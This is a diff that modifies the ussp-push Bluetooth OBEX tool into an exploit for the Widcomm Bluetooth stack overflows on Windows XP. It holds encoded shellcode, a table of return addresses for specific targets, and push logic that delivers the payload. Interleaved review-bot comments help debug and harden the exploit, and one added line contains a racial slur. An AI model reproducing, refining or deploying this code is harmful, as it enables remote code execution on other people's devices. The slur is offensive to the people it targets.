--- ussp-push-0.4/obex_main.c 2005-06-01 18:32:59.000000000 -0400
+++ ussp-push-0.4-kf/obex_main.c 2005-12-03 11:49:32.000000000 -0500
@@ -1,4 +1,10 @@
 /*
+ http://www.digitalmunition.com
+ Moded by KF (kf_lists[at]digitalmunition[dot]com) to exploit the Widcomm Overflows from PenTest.
+ http://www.pentest.co.uk/documents/ptl-2004-03.html
+
+*/
+/*
 * UNrooted.net example code
 *
 * Most of these functions are just rips from the Affix Bluetooth project OBEX
@@ -62,7 +68,10 @@
 #include "obex_socket.h"
-#define UPUSH_APPNAME "ussp-push v0.4"
+#include
+#include
+
+#define UPUSH_APPNAME "BluePIMped v0.1"
 #define BT_SERVICE "OBEX"
 #define OBEX_PUSH 5
@@ -316,6 +325,9 @@
 switch (event) {
 case OBEX_EV_PROGRESS:
 printf("Made some progress...\n");
+ sleep(3);
+ printf("Peace nigga...\n");
+ exit(0);
 break;
 case OBEX_EV_ABORT:
@@ -382,9 +394,7 @@
 name = remote;
 name_len = (strlen(name)+1)<<1;
- if( (namebuf = g_malloc(name_len)) ) {
- OBEX_CharToUnicode(namebuf, name, name_len);
- }
+ namebuf = name; // Thanks Mark! If you had not mentioned client side unicode i'd still be stuck messing with venetian shellcode.
 buf = easy_readfile(path, &file_size);
 if(buf == NULL) {
@@ -424,6 +434,24 @@
 return err;
 }
+static void set_device_name(int ctl, int hdev, char *opt) // Johnh as usual...
+{
+ int s = hci_open_dev(hdev);
+
+ if (s < 0) {
+ fprintf(stderr, "Can't open device hci%d: %s (%d)\n",
+ hdev, strerror(errno), errno);
+ exit(1);
+ }
+ if (opt) {
+ if (hci_write_local_name(s, opt, 2000) < 0) {
+ fprintf(stderr, "Can't change local name on hci%d: %s (%d)\n",
+ hdev, strerror(errno), errno);
+ exit(1);
+ }
+ }
+
+}
 /*
 * That's all there is to it. With it all setup like this all I have to do
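Review bot: The two added `#include` lines in the hunk at old line 62 carry no header name on this page (the angle-bracket argument looks stripped by extraction), so the new side does not compile as shown; given the hci_open_dev and hci_write_local_name calls added later in the file they presumably name the BlueZ HCI headers, e.g. `#include <bluetooth/bluetooth.h>` and `#include <bluetooth/hci_lib.h>`, but that should be confirmed against the original patch. The new set_device_name also relies on errno, strerror, sleep and exit, which need `<errno.h>`, `<string.h>`, `<unistd.h>` and `<stdlib.h>` unless the unseen top of the file already pulls them in.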
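Review bot: `exit(0)` inside the OBEX event callback (hunk at old line 316) ends the whole process on the first OBEX_EV_PROGRESS event of whichever push is in flight, which makes the `break` below it unreachable and skips obex_push's normal return path and any cleanup in main; if the first push in main ever needs more than one packet, the second push, the one that carries the return-address buffer, is never sent at all. A less brittle shape is to record the event and let the transfer finish normally, e.g. replace the three added lines with `progress_seen = 1;` and have main decide when to stop. The printed message should also be replaced with neutral wording such as `printf("Progress event received, stopping.\n");`. The enclosing switch and callback begin and end outside the hunk.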
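Review bot: `namebuf = name;` (hunk at old line 382) makes namebuf alias the caller's `remote` string, but `name_len` two lines above is still `(strlen(name)+1)<<1`, twice the bytes actually present; whatever later consumes namebuf with name_len, and any `g_free(namebuf)` that paired with the removed g_malloc, both outside this hunk since obex_push is cut on both sides, now reads strlen+1 bytes past the end of a plain C string and, if the free is still there, frees a non-heap pointer. For the literal `"YouAreBeingPwnedViaBlueTooth"` that main passes on its first call that is a 29-byte over-read of a string constant; the second call is only safe because main's 3000-byte zeroed stack buffer happens to cover the extra length. If the intent is to ship raw bytes instead of UCS-2, the header length should describe bytes that exist, e.g. `name_len = strlen(name) + 1;`, or, if the trailing zero padding matters for the overflow, obex_push should take an explicit name length that main sets to `sizeof(buf)`; in either case the matching g_free has to go if it is still present.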
@@ -434,19 +462,87 @@
 int main( int argc, char **argv )
 {
- if ( argc != 4 ) {
- printf("%s\n\n"
- "Usage: %s {DEVICE, BTADDR@BTCHAN} LFILE RFILE\n\n"
- "\tDEVICE = RFCOMM TTY device file\n"
- "\tBTADDR@BTCHAN = BlueTooth address/name and OBEX channel\n"
- "\tLFILE = Local file path\n"
- "\tRFILE = Remote file name\n\n",
- UPUSH_APPNAME, argv[0]);
+/*
+ The following may be necessary in hcid.conf to prevent the pairing prompts.
+
+ # Authentication and Encryption (Security Mode 3)
+ auth disable;
+ encrypt disable;
+*/
+
+ struct
+ {
+ char *os;
+ u_long ret;
+ }
+ targets[] =
+ {
+ { "[ XP Pro SP0 - Ambicom btysb1.4.2w.zip 1.4.2 Build 10 ]", 0x01abf74e },
+ { "[ XP Pro SP0 - Actiontec Bluetooth Software (ver 1.1 cd label) ]", 0x019bf74e },
+ { "[ XP Pro SP0 - Belkin Bluetooth Software 1.4.2 Build 10 ]", 0x019bf74e },
+ { "[ XP Pro SP1a - Belkin Bluetooth Software 1.4.2 Build 10 ]", 0x0197f74e },
+ { "[ XP Home SP1a (and Pro?) - Belkin Bluetooth Software 1.4.2 Build 10 ]", 0x0199f74e },
+ { "[ Crash ]", 0x41424344 },
+ }, v;
+
+ if ( argc != 3 ) {
+ printf("%s\nUsage: %s {DEVICE, BTADDR@BTCHAN} LFILE RFILE\n\n\tDEVICE = RFCOMM TTY device file\n\tBTADDR@BTCHAN = BlueTooth address/name and OBEX channel\n\tTARGET = Target number\n",UPUSH_APPNAME,argv[0]);
+ printf("Types:\n");
+ int i;
+ for(i = 0; i < sizeof(targets)/sizeof(v); i++)
+ printf("%d [0x%.8x]: %s\n", i, targets[i].ret, targets[i].os);
+
 return( -1 );
 }
- printf( "pushing file %s\n", argv[2] );
- if ( obex_push( (void *)argv[1], argv[2], argv[3] ) != 0 ) {
+ /* http://www.edup.tudelft.nl/~bjwever/ - w32_popup_ExitThread.c */
+ /* Size=224 Encoder=ShikataGaNai http://metasploit.com */
+ /* CATS: ALL YOUR BLUETOOTH ARE BELONG TO US. */
+ /* this still crashes the BTStackServer.exe...
but oh well */
+ unsigned char scode[] =
+ "\x2b\xc9\xda\xcd\xd9\x74\x24\xf4\x5f\xb1\x33\xb8\xd1\xf7\x19\xb7"
+ "\x31\x47\x15\x83\xc7\x04\x03\x96\xe6\xfb\x42\xe4\x38\x3c\xc8\x9f"
+ "\x7b\x8c\x9a\xdf\x77\x67\xec\xc3\x2a\xfc\x65\xf3\x5c\x6f\x1a\x03"
+ "\x9d\x07\xd1\x31\xb3\xb3\x7d\x40\xb8\x5e\x0c\xfe\x85\xd0\x57\x16"
+ "\x07\xfa\xce\xe6\xf8\xfb\x67\x09\x71\x3e\x46\x07\xd0\x29\xaf\xa7"
+ "\xd5\xa9\xf3\xe6\x81\xfa\xc9\xe8\xc1\xd8\x2d\xe8\x11\x62\x62\xa4"
+ "\x31\x3d\x35\x61\x60\x9d\x8b\xc5\xd1\x98\x5f\x9a\x96\x76\x28\x04"
+ "\x68\x25\xed\x64\x28\x8c\xa1\x2b\xe2\x49\x1a\xe7\xb5\x75\x0f\x54"
+ "\x64\x76\xfd\xe1\x9a\x7a\xc8\xef\xb3\x8c\xca\x0f\x44\xa2\x0a\x5f"
+ "\xcd\x39\x31\x36\xd0\x83\x7c\x20\xea\x03\x81\xb0\xbd\x54\x0a\xf5"
+ "\x7d\xd0\x58\xf0\x05\xe7\x8a\xa8\x7e\xb5\x6a\x4d\x6b\x0b\xab\x7c"
+ "\xa2\x2d\xa0\x4a\xbe\xaf\x58\x83\x41\x6e\x6b\xf0\x11\x70\xb3\x73"
+ "\xa9\x06\xcd\x42\xf5\x9c\xdb\xee\x82\x05\x38\x0f\x7e\xdf\xcb\x03"
+ "\xcb\xab\x96\x07\xca\x40\xad\x33\x47\x97\x5a\x64\x09\x67\x7a\x9a";
+
+ set_device_name(0,0,scode);
+ //printf("RENAME DONE: SET NEW NAME TO %s\n",scode);
+ //printf( "pushing file.\n");
+
+ char buf[3000];
+ memset(buf,'\0',sizeof(buf));
+ memset(buf,'Z',3); // Sometimes u need 3 z's
+
+ int type = atoi(argv[2]);
+ if(type)
+ {
+ printf("[-] Selected target:\n");
+ printf(" %d [0x%.8x]: %s\n", type, targets[type].ret, targets[type].os);
+ }
+
+ int x;
+ for(x=0; x<=122; x=x+1)
+ {
+ memcpy(buf+3+(x*4), (unsigned char *) &targets[type].ret, 4);
+ }
+ // Populate HKEY_LOCAL_MACHINE\SOFTWARE\Widcomm\BTConfig\Devices\\Name with shellcode
+ if ( obex_push( (void *)argv[1], "/etc/hosts", "YouAreBeingPwnedViaBlueTooth") != 0 ) {
+ printf( "error\n" );
+ return( -1 );
+ }
+ printf("\nsleeping 3 seconds before triggering the shellcode\n");
+ sleep(3);
+ if ( obex_push( (void *)argv[1], "/etc/hosts", buf ) != 0 ) {
 printf( "error\n" );
 return( -1 );
 }
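Review bot: `int type = atoi(argv[2]);` is used directly as an index into the six-entry `targets[]` array, in the selection printf and in the memcpy loop, with no range check, so a target number outside 0..5 reads past the array and copies whatever follows it into the payload, and a non-numeric argument is silently turned into target 0 by atoi; add `if (type < 0 || type >= (int)(sizeof(targets)/sizeof(v))) { fprintf(stderr, "bad target %d\n", type); return -1; }` right after the atoi, or use strtol with an end-pointer check. The usage text printed two hunks earlier still advertises `LFILE RFILE` although the argc check is now 3 and argv[2] is the target number. `ret` is declared `u_long`, which is 8 bytes on LP64 while the memcpy copies 4 and the `%.8x` conversions receive a long, so the field should be `uint32_t` to make both the copy and the format correct. Separately, both pushes send the attacking host's `/etc/hosts` to the remote device as the object body; any small throwaway file would do and would not disclose local name-resolution configuration to the target.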